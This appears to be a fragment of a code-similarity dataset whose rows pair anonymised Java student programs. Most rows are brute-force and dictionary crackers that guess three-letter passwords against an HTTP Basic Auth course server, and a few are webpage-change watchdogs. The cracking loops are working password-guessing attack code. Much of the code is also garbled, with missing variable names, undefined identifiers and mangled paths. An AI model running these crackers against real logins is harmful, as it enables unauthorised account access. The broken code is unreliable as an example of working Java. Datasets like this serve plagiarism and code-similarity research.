\n if (sec.getHeaderField(0).equals(\"HTTP/1.1 200 OK\"))\n \
\ {\n Password=Passwd;\n return Password;\n\
\ }\n sec.disconnect();\n } \n \
\ } \n } \n return \"Password not found\";\n }\n\n private static\
\ String encode(String userPasswd) throws Exception\n {\n String ad;\n\
\ String encodedUserPasswd=\" \";\n String addr= \"~//base64_encode.php\
\ \"+userPasswd ;\n Process p = Runtime.getRuntime().exec(new String[]{\"\
/usr/local//bash\",\"-c\", addr});\n BufferedReader resp = new BufferedReader(new\
\ InputStreamReader(p.getInputStream()));\n \n while ( (cad = resp.readLine())\
\ != null )\n {\n \n encodedUserPasswd=cad;\n }\n \
\ return encodedUserPasswd;\n }\n}\n\n"
- source_sentence: "\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\
\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime\
\ t = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\
\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr =\
\ t.exec(\"md5sum csfirst.html\");\n\n InputStreamReader stre\
\ = new InputStreamReader(pr.getInputStream());\n BufferedReader\
\ bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\
\t\t index = s.indexOf(' ');\n\t\t Fmd5 = s.substring(0,index);\n\t\t \
\ System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t \
\ pr = t.exec(\"wget http://www.cs.rmit.edu./students/\");\n\t\t pr = null;\n\
\t\t \n\t\t pr = t.exec(\"md5sum index.html\");\n\t\t \n\n\t\t InputStreamReader\
\ stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader\
\ bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\
\t\t index = temp1.indexOf(' ');\n\t\t Smd5 = temp1.substring(0,index);\n\
\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5\
\ == Smd5)\n\t\t System.out.println(\" changes Detected\");\n\t\t else\n\
\t\t {\n\t\t pr = t.exec(\"diff csfirst.html index.html > report.html\"\
);\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\
\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(\" Message.txt\
\ | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.\");\n\t\t\
\ \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException\
\ e){}\n\t}\n}\t\t\n"
sentences:
- "\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic\
\ class MyWatchDogTimer extends TimerTask\n{\n\tpublic void run()\n\t{\n\t Runtime\
\ rt = Runtime.getRuntime();\n\t Process prss= null;\n\t String initialmd5,presentmd5,finalmd5,temp1;\n\
\ String mesg1 = new String();\n String subject = new String(\"\
Report of WatchDog\");\n\n\t int i;\n \n\t try\n {\n\n \
\ prss = rt.exec(\"md5sum first.html\");\n\n InputStreamReader\
\ instre1 = new InputStreamReader(prss.getInputStream());\n BufferedReader\
\ bufread1 = new BufferedReader(instre1);\n\t\t \n sw = bufread1.readLine();\n\
\t i = finalmd5.indexOf(' ');\n\t initialmd5 = finalmd5.substring(0,i);\n\
\t System.out.println(\"this is of first.html--->\"+initialmd5);\n\t\t \
\ \n\n\t\t \n prss = rt.exec(\"wget -R mpg,mpeg, --output-document=present.html\
\ http://www.cs.rmit.edu./students/\");\n\n\t\t \n prss = rt.exec(\"\
md5sum present.html\");\n\t\t \n InputStreamReader instre2 = new\
\ InputStreamReader(prss.getInputStream());\n BufferedReader bufread2\
\ = new BufferedReader(instre2);\n\t\t \n\t temp1 = bufread2.readLine();\n\
\t i = temp1.indexOf(' ');\n\t presentmd5 = temp1.substring(0,i);\n\t\
\ System.out.println(\"this is of present.html---->\"+presentmd5);\n\t\t\n\
\ \n if(initialmd5.equals(presentmd5))\n \
\ System.out.println(\"The checksum found using md5sum is same\");\n\t\t else\n\
\t\t {\n\t\t prss = rt.exec(\"diff first.html present.html > diff.html\"\
);\n System.out.println(\" is different\"); \n \
\ prss = null;\n mesg1 =\"php mail.php\";\n\t\t \
\ prss = rt.exec(mesg1);\n\t\t } \n\n prss = rt.exec(\"\
rm present.*\");\n\n \t }catch(java.io.IOException e){}\n\n }\n\
}\t\t\n"
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class Dictionary\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n Dictionary a = new Dictionary();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n File file = new File(\"words\");\n\
\ exit:\n try {\n\t\t BufferedReader in = new BufferedReader(new FileReader(file));\n\
\t\t int attempt = 0;\n\t\t inp[2] = in.readLine();\n\t\t while (inp[2] != null)\
\ {\n\t\n\t\t\t if (inp[2].length() <= 3) {\n\t\t\t \tattempt++;\n\t\t\t \ta.doit(inp);\n\
\ \t\t \tif (status) {\n\t\t\t \t\t System.out.println(\"Crrect password is:\
\ \" + inp[2]);\n\t\t\t \t\t System.out.println(\"Number of attempts = \" + attempt);\n\
\t\t\t \t\t break exit;\n\t\t\t \t}\n\t\t \t }\n\t\t\t inp[2] = in.readLine();\n\
\ \t\t}\n\t } catch (FileNotFoundException e1) {\n\t\t \n\t\tSystem.err.println(\"\
File not found: \" + file);\n\t} catch (IOException e2) {\n\t\t\n\t\te2.printStackTrace();\n\
\t}\n\n }\n\n public void doit(String args[]) {\n \n try {\n \
\ BufferedReader in = new BufferedReader(\n new InputStreamReader\n\
\ (connectURL(new URL(args[0]), args[1], args[2])));\n String\
\ line;\n while ((line = in.readLine()) != null) {\n System.out.println(line);\n\
\ status = true;\n }\n }\n catch (IOException e)\
\ {\n \n }\n }\n\n public InputStream connectURL (URL url, String\
\ uname, String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\n\nimport java.net.*; \nimport java.io.*; \nimport java.util.Date; \npublic\
\ class Dictionary{\nprivate static String password=\" \"; \n\n \n public\
\ static void main(String[] args) {\n String Result=\"\"; \n\t if (args.length<1)\n\
\t {\n System.out.println(\"Correct Format Filename username e.g<>\");\
\ \n System.exit(1);\t\n\t }\n\t \n\t Dictionary dicton1 = new Dictionary();\n\
\ Result=dicton1.Dict(\"http://sec-crack.cs.rmit.edu./SEC/2/\",args[0]);\
\ \n\t System.out.println(\"Cracked Password for The User \"+args[0]+\" The Password\
\ is..\"+Result); \n \n\n \n \n }\n\n\n\n private String Dict(String urlString,String\
\ username) \n { \n int cnt=0;\n FileInputStream stream=null;\n DataInputStream\
\ word=null;\n\n\ttry{ \n\t stream = new FileInputStream (\"/usr/share/lib/dict/words\"\
); \n\n\tword =new DataInputStream(stream);\n\t t0 = System.currentTimeMillis();\
\ \n\t\t while (word.available() !=0) \n\t\t\t{\n\t\t\t\t\t\t\t\t\t\n\t\t\t\
password=word.readLine();\n\t\t\t\t if (password.length()!=3)\n\t\t\t\t {\n\t\t\
\t\t\tcontinue;\n\t\t\t\t }\n\t\t\t\t System.out.print(\"crackin...:\"); \n\t\t\
\t System.out.print(\"\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\" ); \n\t\t\t URL\
\ url = new URL (urlString);\n\t\t\t\tString userPassword=username+\":\"+password;\
\ \n\t\t\t\t \n\t\t\t\t String encoding = new url.misc.BASE64Encoder().encode\
\ (userPassword.getBytes());\n\t\t\t\t\t URLConnection conc = url.openConnection();\n\
\t\t\t\t\t\t conc.setRequestProperty (\"Authorization\", \" \" + encoding);\t\
\t\t \n\t\t\t\t\t\t conc.connect(); \n\t\t\t\t\t\t cnt++;\n\t\t\t\t\t \
\ if (conc.getHeaderField(0).trim().equalsIgnoreCase(\"HTTP/1.1 200 OK\"))\n\t\
\t\t\t\t\t {\n\t\t\t\t\t\t\tSystem.out.println(\"The Number Of Attempts : \"+cnt);\
\ \n\t\t\t\t\t\t\t t1 = System.currentTimeMillis(); \n\t\t\t\t\t\t\t net=t1-t0;\n\
\t\t\t\t\t\t\tSystem.out.println(\"Total Time in secs...\"+net/1000); \n\t\t\t\
\t\t\t\treturn password; \n\t\t\t\t\t\t}\n \t\t \t\t\n\t }\n\n\t\t\t\t\
}\n\n\t\t \tcatch (Exception e )\n\t\t\t\t{\n\t\t\t\t e.printStackTrace();\
\ \n\n\t\t\t\t}\n\n \ntry\n{\nword.close();\nstream.close(); \n\t\n}\n \n\
catch (IOException e)\n{ \nSystem.out.println(\"Error in closing input file:\\\
n\" + e.toString()); \n} \n\nreturn \"Password could not found\"; \n } \n \n\
\n}"
- source_sentence: "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary\
\ extends Authenticator {\n\n \n private String username;\n \n private\
\ char [] thisPassword;\n \n private URL url;\n \n private BufferedReader\
\ bf;\n\n \n public static void main(String [] args) {\n if(args.length!=3)\
\ {\n System.err.println(\n \"usage: Dictionary\
\ <url> <username> <dictionary-file>\");\n System.exit(1);\n \
\ }\n Dictionary d = null;\n try {\n d = new Dictionary(args[0],\
\ args[1], args[2]);\n } catch (MalformedURLException me) {\n \
\ me.printStackTrace();\n System.exit(1);\n } catch (FileNotFoundException\
\ fe) {\n fe.printStackTrace();\n System.exit(1);\n \
\ }\n d.work();\n }\n\n \n public Dictionary(String url, String\
\ username, String passwordFilename) \n throws MalformedURLException,\
\ FileNotFoundException {\n this.url = new URL(url);\n this.username\
\ = username;\n thisPassword = new char [] {'a'};\n File f = new\
\ File(passwordFilename);\n FileReader fr = new FileReader(f);\n \
\ bf = new BufferedReader(fr);\n }\n\n \n public void work() {\n \
\ Authenticator.setDefault(this);\n HttpURLConnection uc = null;\n\
\ try { \n uc\
\ = (HttpURLConnection) url.openConnection(); \n uc.connect(); \
\ \n while(uc.getResponseCode()==HttpURLConnection.HTTP_UNAUTHORIZED\
\ &&\n thisPassword !=null) {\n try { \
\ \n InputStream is = uc.getInputStream();\
\ \n uc.connect(); \n \
\ } catch (ProtocolException pe) { \n \
\ uc = (HttpURLConnection) url.openConnection(); \n \
\ } catch (NullPointerException npe) { \n npe.printStackTrace();\
\ \n System.exit(1); \
\ \n } \n \
\ } \n } catch\
\ (java.io.IOException e ) { \n e.printStackTrace();\
\ \n System.exit(1); \
\ \n } \
\ \n System.out.println(\"password=\" + new String(thisPassword));\n\
\ }\n\n \n public PasswordAuthentication getPasswordAuthentication()\
\ {\n String s=null;\n try {\n for(s = bf.readLine();\
\ s!=null; s = bf.readLine()) {\n if(s.length()==3) {\n \
\ break;\n }\n } \n } catch (IOException\
\ e) {\n e.printStackTrace();\n System.exit(1);\n \
\ }\n if(s.length()!=3) {\n thisPassword = null;\n }\
\ else {\n thisPassword = s.toCharArray();\n }\n return\
\ new PasswordAuthentication(username, thisPassword);\n }\n}\n"
sentences:
- "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private\
\ String strUserName;\n private String strURL;\n private String strDictPath;\n\
\ private int iAttempts;\n\n \n public Dictionary(String strURL,String\
\ strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName\
\ = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n\
\ }\n \n\n public String getPassword(){\n URL u;\n String result\
\ =\"\";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection\
\ uc;\n String strPassword = new String();\n String strEncode;\n \
\ try{\n while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n\
\ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n\
\ uc = u.openConnection();\n uc.setDoInput(true);\n \
\ uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode\
\ = strUserName + \":\" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\
\ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \
\ \n result = uc.getHeaderField(0);\n uc = null;\n \
\ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\
\ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\
\ return(strPassword);\n }\n \n public int getAttempts(){\n return\
\ (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart\
\ = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF\
\ = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println(\"Processing\
\ ... \");\n timeStart = System.currentTimeMillis();\n System.out.println(\"\
Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\
\ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \" (msec)\"\
);\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n }\n\
\ else {\n System.out.println(\"[Usage] java BruteForce <URL> <USERNAME>\
\ <Dictionary path>\");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private\
\ char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader\
\ inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n\
\ inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n \
\ catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public\
\ String getNewPassword()\n throws PasswordFailureException{\n try {\n \
\ {\n line = inputFile.readLine();\n }while (line.length() !=\
\ iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException\
\ ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends\
\ RuntimeException {\n\n public PasswordFailureException() {\n }\n}"
- "import java.net.*;\nimport java.io.*;\n\n\npublic class BruteForce extends Authenticator\
\ {\n\n \n private String username;\n \n private URL url;\n \n\
\ private char [] nextPassword;\n \n private char [] thisPassword;\n\n\
\ \n public static void main(String [] args) {\n if(args.length!=2)\
\ {\n System.err.println(\"usage: BruteForce <url> <username>\");\n\
\ System.exit(1);\n }\n BruteForce bf = null;\n \
\ try {\n bf = new BruteForce(args[0], args[1]);\n } catch\
\ (MalformedURLException me) {\n me.printStackTrace();\n \
\ System.exit(1);\n }\n bf.work();\n System.exit(0);\n \
\ }\n\n \n public BruteForce(String url, String username) \n \
\ throws MalformedURLException {\n this.url = new URL(url);\n \
\ this.username = username;\n this.nextPassword = new char [] {'a'};\n\
\ }\n\n \n public void work() {\n Authenticator.setDefault(this);\n\
\ HttpURLConnection uc = null;\n try {\n uc = (HttpURLConnection)\
\ url.openConnection();\n uc.connect();\n\t while(uc.getResponseCode()==HttpURLConnection.HTTP_UNAUTHORIZED\n\
\ && nextPassword!=null) {\n try {\n \
\ InputStream is = uc.getInputStream();\n uc.connect();\n\
\ } catch (ProtocolException pe) {\n uc = (HttpURLConnection)\
\ url.openConnection();\n } catch (NullPointerException npe) {\n\
\ npe.printStackTrace();\n System.exit(1);\n\
\ } \n }\n } catch (java.io.IOException e) {\n\
\ e.printStackTrace();\n System.exit(1);\n }\n \
\ System.out.println(\"password=\" + new String(thisPassword));\n }\n\n\
\ \n public PasswordAuthentication getPasswordAuthentication() {\n \
\ createNextPassword();\n return new PasswordAuthentication(username,\
\ thisPassword);\n }\n\n \n public void createNextPassword() {\n \
\ int i;\n if(thisPassword==null) {\n thisPassword = new\
\ char [] {'A', 'A', 'A'};\n nextPassword = new char [] {'A', 'A',\
\ 'B'};\n return;\n }\n thisPassword = nextPassword;\n\
\ if(nextPassword[2]=='Z') {\n nextPassword[2]='a';\n \
\ return;\n } else if(nextPassword[2]!='z') {\n i = (int)\
\ nextPassword[2];\n nextPassword[2]=(char) ++i;\n } else {\n\
\ nextPassword[2]='A';\n if(nextPassword[1]=='Z') {\n \
\ nextPassword[1]='a';\n } else if(nextPassword[1]!='z')\
\ {\n i = (int) nextPassword[1];\n nextPassword[1]=(char)\
\ ++i;\n } else {\n nextPassword[1]='A';\n \
\ if(nextPassword[0]=='Z') {\n nextPassword[0]='a';\n\
\ } else if(nextPassword[0]!='z') {\n i = (int)\
\ nextPassword[0];\n nextPassword[0]=(char) ++i;\n \
\ } else {\n nextPassword = null;\n }\n\
\ }\n }\n }\n}\n"
- "\n\nimport java.net.*;\nimport java.io.*;\n\t\n\nclass MyAuthenticator extends\
\ Authenticator {\n\n String password;\n\n public MyAuthenticator(String pwdin)\
\ {\n password = pwdin;\n }\n \n protected PasswordAuthentication\
\ getPasswordAuthentication(){\n\tString pwd = password;\n\treturn new PasswordAuthentication(\"\
\",pwd.toCharArray());\n }\n}\n"
- source_sentence: "import java.net.*;\nimport java.util.*;\n\npublic class BruteForce\
\ {\n\n public static void main(String[] args) {\n new CrackAttempt();\n\
\ }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int\
\ MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n \
\ boolean morePasswords = true;\n int passPtr = 0;\n StringBuffer\
\ validChars = new StringBuffer(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
);\n char[] password = new char[MAX_LENGTH];\n\n password[0] = validChars.charAt(0);\n\
\ while (!auth && morePasswords) {\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n try {\n \n Authenticator.setDefault(new CrackAuth(password));\n\
\ URL url = new URL(resource);\n HttpURLConnection conn\
\ = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"\
HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK)\
\ {\n System.out.println(\"cracked with \" + new String(password));\n\
\ auth = true;\n }\n } catch (Exception e) {\n\
\ System.out.println(\" was exception: \" + e.getMessage());\n \
\ }\n int count = passPtr;\n while (true) {\n \
\ if (password[count] == validChars.charAt(validChars.length() - 1)) {\n \
\ password[count] = validChars.charAt(0);\n count--;\n\
\ } else {\n password[count] = validChars.charAt(validChars.indexOf(String.valueOf(password[count]))\
\ + 1);\n break;\n }\n if (count < 0) {\n\
\ \n if (passPtr < MAX_LENGTH - 1) {\n \
\ passPtr++;\n password[passPtr] = validChars.charAt(0);\n\
\ } else {\n morePasswords = false;\n \
\ }\n break;\n }\n }\n \n }\
\ \n if (!auth) {\n System.out.println(\"Unable determine password\"\
);\n } else {\n time = (new Date()).getTime() - start.getTime();\n\
\ System.out.println(\"it took \" + String.valueOf(time) + \" milliseconds\
\ crack the password\");\n }\n }\n}\n\nclass CrackAuth extends Authenticator\
\ {\n char[] password;\n public CrackAuth(char[] password) {\n this.password\
\ = password;\n }\n\n protected PasswordAuthentication getPasswordAuthentication()\n\
\ {\n String user = \"\";\n return new PasswordAuthentication(user,\
\ password);\n }\n}\n"
sentences:
- "import java.io.*;\nimport java.util.*;\nimport java.net.*;\nimport java.net.Authenticator;\n\
\n\npublic class BruteForce\n{\n\n\tprivate String result =\"\";\n\n\tpublic\
\ class customAuthenticator extends Authenticator {\n\t public customAuthenticator(String\
\ passwd)\n {\n this.pass = passwd;\n }\n\n\t \
\ protected PasswordAuthentication getPasswordAuthentication()\n \
\ {\n\t return new PasswordAuthentication(\"\",pass.toCharArray());\n\
\ }\n public String pass;\n }\n\n public BruteForce()\
\ {\n java.util.Date d = java.util.Calendar.getInstance().getTime();\n\
\ System.out.println(d.toString());\n\t\tchar words[] = { 'a','b','c','d','e',\
\ 'f', 'g', 'h', 'i','j','k','l','m','n','o','p',\n\t\t\t\t\t\t\t 'q','r','s','t','u','v','w','x','y','z',\
\ 'A','B','C','D','E', 'F', 'G',\n\t\t\t\t\t\t\t 'H', 'I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};\n\
\n\t\tString record = null;\n\n\n\n String url = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\n\t\tchar pass[] = {'x','x','x'};\n\t\tint count=1;\n\t\tString passwd=new\
\ String();\n HttpURLConnection connection = null;\n URL u = null;\n\
\n try\n {\n u = new URL(url);\n\n }\n catch\
\ (MalformedURLException e)\n {\n }\n\n for(int a=0;a<words.length;a++)\n\
\ {\n for(int b=0;b<words.length;b++)\n {\n\
\ for(int c=0;c<words.length;c++)\n \
\ {\n pass[0]=words[a];\n \
\ pass[1]=words[b];\n pass[2]=words[c];\n\
\ passwd=passwd.copyValueOf(pass,0,3);\n \
\ System.out.println(count+ \" ) \" + passwd);\n \
\ count++;\n try\n\
\ {\n\n \
\ connection = (HttpURLConnection) u.openConnection();\n \
\ Authenticator.setDefault(new customAuthenticator(passwd));\n\
\n if (connection.getResponseCode()!=401)\n\
\ {\n \
\ System.out.print(\"The password is : \"+passwd);\n \
\ System.out.println();\n \
\ java.util.Date d1 = java.util.Calendar.getInstance().getTime();\n\
\ System.out.println(d1.toString());\n\
\ System.out.println(\"\\ntime taken\
\ in seconds:\"+ (d1.getTime() - d.getTime())/1000+\"\\n\");\n\n \
\ System.exit(0);\n \
\ }\n else\n \
\ {\n }\n \
\ connection.disconnect();\n \
\ }\n catch (IOException e)\n \
\ {\n System.out.println(e);\n\
\ }\n }\n \
\ }\n }\n }\n\n\tpublic static void main(String[] args)\n\t{\n\n\n\
\t\tBruteForce = new BruteForce();\n\t}\n}"
- "\n\n\nimport org.apache.commons.httpclient.HttpClient;\nimport org.apache.commons.httpclient.UsernamePasswordCredentials;\n\
import org.apache.commons.httpclient.cookie.CookiePolicy;\nimport org.apache.commons.httpclient.methods.GetMethod;\n\
\n\n\n\npublic class BruteForce{\n\n static final String LOGON_SITE_HACKER\
\ = BruteForcePropertyHelper.getProperty(\"logonSite\");\n static final int\
\ LOGON_PORT_HACKER = Integer.valueOf(BruteForcePropertyHelper.getProperty(\"\
logonPort\")).intValue();\n\n static final int USE_PROXY_SERVER = Integer.valueOf(BruteForcePropertyHelper.getProperty(\"\
useProxyServer\")).intValue();\n static final int PROXY_PORT = Integer.valueOf(BruteForcePropertyHelper.getProperty(\"\
proxyPort\")).intValue();\n\n static final String PROXY_SERVER = BruteForcePropertyHelper.getProperty(\"\
proxyServer\");\n static final String PROXY_USENAME = BruteForcePropertyHelper.getProperty(\"\
proxyUserName\");\n static final String PROXY_PASSWORD = BruteForcePropertyHelper.getProperty(\"\
proxypassword\");\n\n static final String GET_METHOD_HACKER = BruteForcePropertyHelper.getProperty(\"\
getMethod\");\n static final int NUMBER_OF_GETS_BEFORE_RELEASE = Integer.valueOf(BruteForcePropertyHelper.getProperty(\"\
numberOfGetsBeforeReleaseConnection\")).intValue();\n\n static final String[]\
\ cValidChars\t = {\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\"\
,\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\"\
,\"x\",\"y\",\"z\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"\
,\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\"\
,\"X\",\"Y\",\"Z\"};\n\n public BruteForce() {\n super();\n }\n\n\
\n\n\n public static void main (String[] args) throws Exception {\n\n\t\tString\t\
statusLine = \" \";\n\t\tint\t\tcount = 0;\n\t\tint\t\tfirstLetterIndex = 0;\n\
\t\tint\t\tsecondLetterIndex = 0;\n\t\tint\t\tthirdLetterIndex = 0;\n\t\tint\t\
\tdivValue = 0;\n\n\n\n\n\t\tString userName = \"\";\n\t\tString password = \"\
\";\n\n\n HttpClient client = new HttpClient();\n\n\t\t\n\n if (USE_PROXY_SERVER\
\ == 1) {\n \t\t\tclient.getHostConfiguration().setProxy(PROXY_SERVER, PROXY_PORT);\n\
\ \t\t\tclient.getState().setProxyCredentials(null, null, new UsernamePasswordCredentials(PROXY_USENAME,\
\ PROXY_PASSWORD));\n\n }\n\n client.getState().setCookiePolicy(CookiePolicy.COMPATIBILITY);\n\
\ client.getHostConfiguration().setHost(LOGON_SITE_HACKER, LOGON_PORT_HACKER,\
\ \"http\");\n GetMethod getMethod = new GetMethod(GET_METHOD_HACKER);\n\
\n\n\t\t\n\n\t\tcount = 0;\n\n\t\tfor (int f = 0; f < 52; f++) {\n\n\t\t\tfirstLetterIndex\
\ = f;\n\n\t\t\tpassword = cValidChars[firstLetterIndex];\n\t\t\tSystem.out.println(\"\
Count: \"+ count + \" First Index: \"+ firstLetterIndex+ \" password: \"+ password);\n\
\n\t client.getState().setCredentials(null, null, new UsernamePasswordCredentials(userName,\
\ password));\n\t client.executeMethod(getMethod);\n\t statusLine\
\ = getMethod.getStatusLine().toString();\n\n\n\t\t\tif (statusLine.compareTo(\"\
HTTP/1.1 200 OK\") == 0) {\n\t\t\t\tSystem.out.println(\"Found the user name and\
\ password for the site. The username is: \"+ userName+ \" and the password is:\
\ \"+ password);\n\t\t\t\tSystem.exit(0);\n\t\t\t}\n\t }\n\n\n\t\t\n\t\tcount\
\ = 0;\n\n\t\tfor (int g = 0; g < 52; g++) {\n\n\t\t\tfirstLetterIndex = g;\n\n\
\t\t\tfor (int h = 0; h < 52; h++) {\n\n\t\t\tsecondLetterIndex = h;\n\n\t\t\t\
password = cValidChars[firstLetterIndex]+ cValidChars[secondLetterIndex];\n\n\t\
\t\t\tSystem.out.println(\"Count: \"+ count+ \" First Index: \"+ firstLetterIndex+\
\ \" Second Index: \"+ secondLetterIndex+ cValidChars[firstLetterIndex]+ cValidChars[secondLetterIndex]+\
\ cValidChars[thirdLetterIndex]+ \" password: \"+ password);\n\n\t\t client.getState().setCredentials(null,\
\ null, new UsernamePasswordCredentials(userName, password));\n\n\t\t\t\t++count;\n\
\n\t\t\t\tdivValue = count % NUMBER_OF_GETS_BEFORE_RELEASE;\n\n\n\t\t\t\tif (divValue\
\ == 0) {\n\n\t\t\t\t\tSystem.out.println(\"Count: \"+ count+ \" Div Value: \"\
+ divValue + \" Releasing the connection and getting new one\");\n\t\t\t\t\tgetMethod.releaseConnection();\n\
\t\t\t\t\tgetMethod = null;\n\t\t\t\t\tgetMethod = new GetMethod(GET_METHOD_HACKER);\n\
\n\t\t\t\t}\n\n\t\t client.executeMethod(getMethod);\n\n\t\t statusLine\
\ = getMethod.getStatusLine().toString();\n\t\t\t\tSystem.out.println(\"Found\
\ the user name and password for the site. The username is: \"+ userName+ \" and\
\ the password is: \"+ password);\n\n\t\t\t\tif (statusLine.compareTo(\"HTTP/1.1\
\ 200 OK\") == 0) {\n\t\t\t\t\tSystem.out.println(\"Found the user name and password\
\ for the site. The username is: \"+ userName+ \" and the password is: \"+ password);\n\
\n\t\t\t\t\tSystem.exit(0);\n\t\t\t\t}\n\t\t }\n\n\t\t}\n\n\t\t\n\t\t\n\n\t\
\tgetMethod.releaseConnection();\n\t\tgetMethod = null;\n\t\tgetMethod = new GetMethod(GET_METHOD_HACKER);\n\
\n\t\tcount = 0;\n\t\tfor (int i = 0; i < 52; i++) {\n\n\t\t\tfirstLetterIndex\
\ = i;\n\n\t\t\tfor (int j = 0; j < 52; j++) {\n\n\t\t\t\tsecondLetterIndex =\
\ j;\n\n\t\t\t\tfor (int k = 0; k < 52; k++) {\n\n\t\t\t\t\tthirdLetterIndex =\
\ k;\n\n\t\t\t\t\tpassword = cValidChars[firstLetterIndex]+ cValidChars[secondLetterIndex]+\
\ cValidChars[thirdLetterIndex];\n\t\t\t\t\tSystem.out.println(\"Count: \"+ count+\
\ \" First Index: \"+ firstLetterIndex+ \" Second Index: \"+ secondLetterIndex+\
\ \" Third Index: \"+ thirdLetterIndex+ \" \"+ cValidChars[firstLetterIndex]+\
\ cValidChars[secondLetterIndex]+ cValidChars[thirdLetterIndex]+ \" password:\
\ \"+ password);\n\n\t\t\t client.getState().setCredentials(null, null,\
\ new UsernamePasswordCredentials(userName, password));\n\n\t\t\t\t\t++count;\n\
